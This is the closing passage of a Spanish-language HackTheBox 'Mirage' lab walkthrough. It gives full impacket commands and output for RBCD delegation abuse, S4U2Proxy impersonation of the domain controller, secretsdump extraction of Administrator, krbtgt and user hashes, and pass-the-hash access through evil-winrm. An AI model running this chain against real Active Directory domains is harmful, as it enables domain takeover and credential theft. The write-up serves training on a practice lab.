[*]     Security Extension SID: 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Connecting to 'ldaps://10.10.11.78:636'
[*] Authenticated to '10.10.11.78' as: 'u:MIRAGE\\DC01$'
Type help for list of commands

# set_rbcd DC01$ Mirage-Service$
Found Target DN: CN=DC01,OU=Domain Controllers,DC=mirage,DC=htb
Target SID: S-1-5-21-2127163471-3824721834-2568365109-1000

Found Grantee DN: CN=Mirage-Service,CN=Managed Service Accounts,DC=mirage,DC=htb
Grantee SID: S-1-5-21-2127163471-3824721834-2568365109-1112
Delegation rights modified successfully!
Mirage-Service$ can now impersonate users on DC01$ via S4U2Proxy

# exit
Bye!
❯

ref. ESC10

Solicitamos un service ticket para mirage-service especificando -impersonate DC01.

1
2
3
4
5
6
7
8


❯ KRB5CCNAME=mirage-service$.ccache faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" impacket-getST -spn 'cifs/DC01.mirage.htb' -impersonate DC01 -dc-ip 10.10.11.78 'mirage.htb/mirage-Service$' -k -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Impersonating DC01
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC01@cifs_DC01.mirage.htb@MIRAGE.HTB.ccache
❯

Finalmente con este ultimo ticket logramos obtener el hash de administrator.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


❯ KRB5CCNAME=DC01@cifs_DC01.mirage.htb@MIRAGE.HTB.ccache faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" impacket-secretsdump -k -no-pass DC01.mirage.htb -just-dc-user Administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
mirage.htb\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7be6d4f3c2b9c0e3560f5a29eeb1afb3:::
[*] Kerberos keys grabbed
mirage.htb\Administrator:aes256-cts-hmac-sha1-96:09454bbc6da252ac958d0eaa211293070bce0a567c0e08da5406ad0bce4bdca7
mirage.htb\Administrator:aes128-cts-hmac-sha1-96:47aa953930634377bad3a00da2e36c07
mirage.htb\Administrator:des-cbc-md5:e02a73baa10b8619
[*] Cleaning up... 
❯

ref. Resource Based Constrained Delegation (RBCD) for Penetration Testing

Shell

Solicitamos un ticket con el hash.

1
2
3
4
5


❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" impacket-getTGT -dc-ip 10.10.11.78 mirage.htb/administrator -hashes :7be6d4f3c2b9c0e3560f5a29eeb1afb3
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in administrator.ccache
❯

Logrando una shell como administrator y la flag root.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" evil-winrm -i dc01.mirage.htb -r mirage.htb
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
mirage\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
9342842359559823b3082c946f8d4e14
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Dump Hashes

Realizamos un dump de las hashes con impacket-secretdumps.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54


❯ KRB5CCNAME=DC01@cifs_DC01.mirage.htb@MIRAGE.HTB.ccache faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" impacket-secretsdump -k -no-pass DC01.mirage.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
mirage.htb\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7be6d4f3c2b9c0e3560f5a29eeb1afb3:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1adcc3d4a7f007ca8ab8a3a671a66127:::
mirage.htb\Dev_Account_A:1104:aad3b435b51404eeaad3b435b51404ee:3db621dd880ebe4d22351480176dba13:::
mirage.htb\Dev_Account_B:1105:aad3b435b51404eeaad3b435b51404ee:fd1a971892bfd046fc5dd9fb8a5db0b3:::
mirage.htb\david.jjackson:1107:aad3b435b51404eeaad3b435b51404ee:ce781520ff23cdfe2a6f7d274c6447f8:::
mirage.htb\javier.mmarshall:1108:aad3b435b51404eeaad3b435b51404ee:694fba7016ea1abd4f36d188b3983d84:::
mirage.htb\mark.bbond:1109:aad3b435b51404eeaad3b435b51404ee:8fe1f7f9e9148b3bdeb368f9ff7645eb:::
mirage.htb\nathan.aadam:1110:aad3b435b51404eeaad3b435b51404ee:1cdd3c6d19586fd3a8120b89571a04eb:::
mirage.htb\svc_mirage:2604:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:b5b26ce83b5ad77439042fbf9246c86c:::
Mirage-Service$:1112:aad3b435b51404eeaad3b435b51404ee:305806d84f7c1be93a07aaf40f0c7866:::
[*] Kerberos keys grabbed
mirage.htb\Administrator:aes256-cts-hmac-sha1-96:09454bbc6da252ac958d0eaa211293070bce0a567c0e08da5406ad0bce4bdca7
mirage.htb\Administrator:aes128-cts-hmac-sha1-96:47aa953930634377bad3a00da2e36c07
mirage.htb\Administrator:des-cbc-md5:e02a73baa10b8619
krbtgt:aes256-cts-hmac-sha1-96:95f7af8ea1bae174de9666c99a9b9edeac0ca15e70c7246cab3f83047c059603
krbtgt:aes128-cts-hmac-sha1-96:6f790222a7ee5ba9d2776f6ee71d1bfb
krbtgt:des-cbc-md5:8cd65e54d343ba25
mirage.htb\Dev_Account_A:aes256-cts-hmac-sha1-96:e4a6658ff9ee0d2a097864d6e89218287691bf905680e0078a8e41498f33fd9a
mirage.htb\Dev_Account_A:aes128-cts-hmac-sha1-96:ceee67c4feca95b946e78d89cb8b4c15
mirage.htb\Dev_Account_A:des-cbc-md5:26dce5389b921a52
mirage.htb\Dev_Account_B:aes256-cts-hmac-sha1-96:5c320d4bef414f6a202523adfe2ef75526ff4fc6f943aaa0833a50d102f7a95d
mirage.htb\Dev_Account_B:aes128-cts-hmac-sha1-96:e05bdceb6b470755cd01fab2f526b6c0
mirage.htb\Dev_Account_B:des-cbc-md5:e5d07f57e926ecda
mirage.htb\david.jjackson:aes256-cts-hmac-sha1-96:3480514043b05841ecf08dfbf33d81d361e51a6d03ff0c3f6d51bfec7f09dbdb
mirage.htb\david.jjackson:aes128-cts-hmac-sha1-96:bd841caf9cd85366d254cd855e61cd5e
mirage.htb\david.jjackson:des-cbc-md5:76ef68d529459bbc
mirage.htb\javier.mmarshall:aes256-cts-hmac-sha1-96:20acfd56be43c1123b3428afa66bb504a9b32d87c3269277e6c917bf0e425502
mirage.htb\javier.mmarshall:aes128-cts-hmac-sha1-96:9d2fc7611e15be6fe16538ebb3b2ad6a
mirage.htb\javier.mmarshall:des-cbc-md5:6b3d51897fdc3237
mirage.htb\mark.bbond:aes256-cts-hmac-sha1-96:dc423caaf884bb869368859c59779a757ff38a88bdf4197a4a284b599531cd27
mirage.htb\mark.bbond:aes128-cts-hmac-sha1-96:78fcb9736fbafe245c7b52e72339165d
mirage.htb\mark.bbond:des-cbc-md5:d929fb462ae361a7
mirage.htb\nathan.aadam:aes256-cts-hmac-sha1-96:b536033ac796c7047bcfd47c94e315aea1576a97ff371e2be2e0250cce64375b
mirage.htb\nathan.aadam:aes128-cts-hmac-sha1-96:b1097eb42fd74827c6d8102a657e28ff
mirage.htb\nathan.aadam:des-cbc-md5:5137a74f40f483c7
mirage.htb\svc_mirage:aes256-cts-hmac-sha1-96:937efa5352253096b3b2e1d31a9f378f422d9e357a5d4b3af0d260ba1320ba5e
mirage.htb\svc_mirage:aes128-cts-hmac-sha1-96:8d382d597b707379a254c60b85574ab1
mirage.htb\svc_mirage:des-cbc-md5:2f13c12f9d5d6708
DC01$:aes256-cts-hmac-sha1-96:4a85665cd877c7b5179c508e5bc4bad63eafe514f7cedb0543930431ef1e422b
DC01$:aes128-cts-hmac-sha1-96:94aa2a6d9e156b7e8c03a9aad4af2cc1
DC01$:des-cbc-md5:cb19ce2c733b3ba8
Mirage-Service$:aes256-cts-hmac-sha1-96:80bada65a4f84fb9006013e332105db15ac6f07cb9987705e462d9491c0482ae
Mirage-Service$:aes128-cts-hmac-sha1-96:ff1d75e3a88082f3dffbb2b8e3ff17dd
Mirage-Service$:des-cbc-md5:c42ffd455b91f208
[*] Cleaning up... 
❯

HackTheBox - Mirage

Recon

nmap

NFS

Missing DNS Record

Deprecated NTLM

Enumerating Users

DNS Update and Catching Credentials

NATS System Message

NATS streams

User - david.jjackson

bloodhound

Users

Nathan.Aadam

Mark.Bbond

Javier.Mmarshall

Mirage-Service

User - nathan.aadam

Cracking the Hash

Shell WinRM

User - Mark.bbond -> javier.Mmarshall

Change Password javier.mmarshall

Enable User

Logon Hours

User - Mirage-Service$

Read GMSA Password

Privesc

ESC10

Exploit

Shell

Dump Hashes

HackTheBox - Mirage

HackTheBox - Mirage

Recon

nmap

NFS

Missing DNS Record

Deprecated NTLM

Enumerating Users

DNS Update and Catching Credentials

NATS System Message

NATS streams

User - david.jjackson

bloodhound

Users

Nathan.Aadam

Mark.Bbond

Javier.Mmarshall

Mirage-Service

User - nathan.aadam

Cracking the Hash

Shell WinRM

User - Mark.bbond -> javier.Mmarshall

Change Password javier.mmarshall

Enable User

Logon Hours

User - Mirage-Service$

Read GMSA Password

Privesc

ESC10

Exploit

Shell

Dump Hashes

Read other posts

HackTheBox - Mirage